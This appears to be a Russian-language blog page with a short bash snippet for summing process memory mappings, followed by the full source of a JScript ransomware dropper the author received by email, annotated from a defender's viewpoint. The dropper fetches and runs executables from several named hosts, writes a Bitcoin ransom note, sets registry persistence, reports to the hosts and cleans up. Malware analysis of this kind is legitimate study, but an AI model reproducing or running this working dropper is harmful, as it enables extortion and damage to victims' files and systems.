
Тег code в блоге rion


ещё раз про вирт память

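# Ten largest mappings of PID 31507, printed as "<bytes> <path>" and sorted ascending.
# Each /proc/<pid>/maps line is "start-end perms offset dev inode [path...]"; the path is
# optional and may contain spaces (e.g. "/memfd:pulseaudio (deleted)"), so `read` hands
# everything after the fifth field to $path unchanged instead of re-splitting it.
# The range is kept in one variable and the path is quoted throughout: the original
# `set $l` expanded the unquoted line, which subjects pseudo-paths such as "[heap]" or
# "[stack]" to pathname globbing (a bracket pattern matching any single-character file name
# in the current directory) — quoting removes that mis-expansion.
while read -r range _ _ _ _ path; do echo "$((16#${range#*-} - 16#${range%-*})) $path"; done < /proc/31507/maps | sort -n | tail -n10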

66973696
66973696
66973696
67108864 /memfd:pulseaudio (deleted)
67108864 /memfd:pulseaudio (deleted)
67112960 /dev/shm/pulse-shm-3601360319
67112960 /dev/shm/pulse-shm-3811868219
315215872 [heap]
2147483648
274877906944 /home/rion/.local/share/baloo/index


Решил-таки посмотреть, что внутри у очередного свалившегося на почту «вируса», и нашёл там следующее.

// Analyst annotation (defender view). JScript dropper received as an e-mail attachment; the
// comments describe only what the visible code does and which host artifacts it leaves behind.
// Artifacts usable for detection / IR, all derived from the paths and commands below:
//   files   %TEMP%\a1.exe, %TEMP%\a2.exe, %TEMP%\a.exe, %TEMP%\php4ts.dll, %TEMP%\a.php,
//           the note %TEMP%\a.txt and its Desktop copies DECRYPT.txt
//   registry  HKCU\...\CurrentVersion\Run value "Crypted"; HKCR\.crypted and HKCR\Crypted\shell\open\command
//   network   synchronous HTTP GETs to "/counter/" on every host in `ll`, with "ad=", "id=", "rnd=" / "st=" parameters
var id = "TWwA8ZOwBDnvZSjlMTObez2-5pGLJFR6ffAJEPGXGNBaBJyZRCIPzYoO5chFy33z_IzmdcW82GUmNUh_x2gpFDct";   // sample/victim identifier, sent as "id="
var ad = "1N2hKdvStmzixkQDtQWx3meymPdDzhMguf";   // Bitcoin address, printed in the note (step 3) and sent as "ad="
var bc = "0.54226";   // ransom amount in BTC, interpolated into the note text
var ld = 0;   // index of the last host that served a payload; later passes and check-ins use it
var cq = String.fromCharCode(34);   // '"' — quoting for the cmd.exe command lines below
var cs = String.fromCharCode(92);   // '\' — path separator
var ll = ["aaaaa012.com", "kopenhag.net", "onsite-tech.co.uk", "modestyhijab.com", "xpressionsvt.com"];   // download / check-in hosts
var ws = WScript.CreateObject("WScript.Shell");   // command execution via ws.Run(cmd, windowStyle, waitOnReturn)
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";   // %TEMP%\a — prefix of every dropped file
var pd = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "php4ts.dll";   // fourth payload; the name resembles the PHP 4 runtime DLL (cover for a.exe + a.php — inference)
var xo = WScript.CreateObject("Msxml2.XMLHTTP");   // HTTP client, used synchronously (async flag false)
var xa = WScript.CreateObject("ADODB.Stream");   // binary stream used to write response bodies to disk
var fo = WScript.CreateObject("Scripting.FileSystemObject");
// Run-once guard: a.txt is the ransom note written in the second stage, so its presence means
// the script already completed on this machine.
if (!fo.FileExists(fn + ".txt")) {
// Download stage: five payload slots (n = 1..5). Each slot walks the host list starting at the
// last host that answered (ld); the first host returning HTTP 200 with a body larger than
// 1000 bytes serves the slot, ld is pinned to it, and the host loop is left.
for (var n = 1; n <= 5; n++) {
for (var i = ld; i < ll.length; i++) {
var dn = 0;   // 1 once this slot has been served
try {
// "&rnd=" + i + n is string concatenation, not addition: the digits of i followed by the digits of n.
xo.open("GET", "http://" + ll[i] + "/counter/?ad=" + ad + "&id=" + id + "&rnd=" + i + n, false);
xo.send();
if (xo.status == 200) {
xa.open();
xa.type = 1;   // adTypeBinary — the body is written verbatim
xa.write(xo.responseBody);
if (xa.size > 1000) {   // smaller replies (error pages and the like) are ignored
dn = 1;
// Slots 1 and 2 are saved as a1.exe / a2.exe and started at once (window style 1, no wait);
// slots 3-5 (a.exe, php4ts.dll, a.php) are only staged for the second stage below.
if (n <= 2) {
xa.saveToFile(fn + n + ".exe", 2);
try {
ws.Run(fn + n + ".exe", 1, 0);
} catch (er) {};   // launch failures are swallowed
} else if (n == 3) {
xa.saveToFile(fn + ".exe", 2);
} else if (n == 4) {
xa.saveToFile(pd, 2);
} else if (n == 5) {
xa.saveToFile(fn + ".php", 2);
}
};
xa.close();
};
if (dn == 1) {
ld = i;
break;
};
} catch (er) {};   // network and file errors are swallowed; the next host is simply tried
};
};
// Second stage runs only when all three staged files are present.
if (fo.FileExists(fn + ".exe") && fo.FileExists(pd) && fo.FileExists(fn + ".php")) {
// Check-in "st=start" to the host that served the payloads.
xo.open("GET", "http://" + ll[ld] + "/counter/?ad=" + ad + "&id=" + id + "&st=start", false);
xo.send();
// Ransom note, written to %TEMP%\a.txt and copied to the Desktop as DECRYPT.txt further down.
// Its claims (RSA-1024, file encryption) come from the note text only and are not verifiable
// from this script.
var fp = fo.CreateTextFile(fn + ".txt", true);
fp.WriteLine("ATTENTION!");
fp.WriteLine("");
fp.WriteLine("All your documents, photos, databases and other important personal files");
fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key.");
fp.WriteLine("To restore your files you have to pay " + bc + " BTC (bitcoins).");
fp.WriteLine("Please follow this manual:");
fp.WriteLine("");
fp.WriteLine("1. Create Bitcoin wallet here:");
fp.WriteLine("");
fp.WriteLine(" https://blockchain.info/wallet/new");
fp.WriteLine("");
fp.WriteLine("2. Buy " + bc + " BTC with cash, using search here:");
fp.WriteLine("");
fp.WriteLine(" https://localbitcoins.com/buy_bitcoins");
fp.WriteLine("");
fp.WriteLine("3. Send " + bc + " BTC to this Bitcoin address:");
fp.WriteLine("");
fp.WriteLine(" " + ad);
fp.WriteLine("");
fp.WriteLine("4. Open one of the following links in your browser to download decryptor:");
fp.WriteLine("");
for (var i = 0; i < ll.length; i++) {
fp.WriteLine(" http://" + ll[i] + "/counter/?a=" + ad);
};
fp.WriteLine("");
fp.WriteLine("5. Run decryptor to restore your files.");
fp.WriteLine("");
fp.WriteLine("PLEASE REMEMBER:");
fp.WriteLine("");
fp.WriteLine(" - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.");
fp.WriteLine(" - Nobody can help you except us.");
fp.WriteLine(" - It`s useless to reinstall Windows, update antivirus software, etc.");
fp.WriteLine(" - Your files can be decrypted only after you make payment.");
fp.WriteLine(" - You can find this manual on your desktop (DECRYPT.txt).");
fp.Close();
// Registry changes via "REG ADD" under cmd.exe (window style 0 = hidden, no wait):
//   1. HKCU\...\CurrentVersion\Run value "Crypted" -> a.txt, so the note is re-opened at every logon;
//   2. HKCR\.crypted -> ProgId "Crypted";
//   3. HKCR\Crypted\shell\open\command -> notepad.exe "a.txt", so opening a .crypted file shows the note.
// Items 1 and 3 are the persistent, user-visible leftovers; nothing below removes them.
ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCU" + cs + "SOFTWARE" + cs + "Microsoft" + cs + "Windows" + cs + "CurrentVersion" + cs + "Run" + cq + " /V " + cq + "Crypted" + cq + " /t REG_SZ /F /D " + cq + fn + ".txt" + cq, 0, 0);
ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + ".crypted" + cq + " /ve /t REG_SZ /F /D " + cq + "Crypted" + cq, 0, 0);
ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + "Crypted" + cs + "shell" + cs + "open" + cs + "command" + cq + " /ve /t REG_SZ /F /D " + cq + "notepad.exe " + cs + cq + fn + ".txt" + cs + cq + cq, 0, 0);
// The note is copied to two candidate Desktop locations (under %AppData% and %UserProfile%).
ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%AppData%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%UserProfile%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
// a.exe (presumably the encryptor) is run hidden with a.php as its only argument and
// waitOnReturn = 1, so the script blocks until it exits. What a.php contains is not visible
// here (key material or configuration is a guess — confirm from the sample).
ws.Run("%COMSPEC% /c " + fn + ".exe " + cq + fn + ".php" + cq, 0, 1);
// Show the note to the user.
ws.Run("%COMSPEC% /c notepad.exe " + cq + fn + ".txt" + cq, 0, 0);
// a.php is overwritten with 1000 lines of the Bitcoin address before it is deleted —
// presumably to scrub whatever it held from disk; this is the only content of a.php visible here.
var fp = fo.CreateTextFile(fn + ".php", true);
for (var i = 0; i < 1000; i++) {
fp.WriteLine(ad);
};
fp.Close();
// Cleanup of the staged files only; the note, its Desktop copies and the registry entries
// are left in place. Then check-in "st=done".
ws.Run("%COMSPEC% /c DEL " + cq + fn + ".php" + cq, 0, 0);
ws.Run("%COMSPEC% /c DEL " + cq + fn + ".exe" + cq, 0, 0);
ws.Run("%COMSPEC% /c DEL " + cq + pd + cq, 0, 0);
xo.open("GET", "http://" + ll[ld] + "/counter/?ad=" + ad + "&id=" + id + "&st=done", false);
xo.send();
};
};
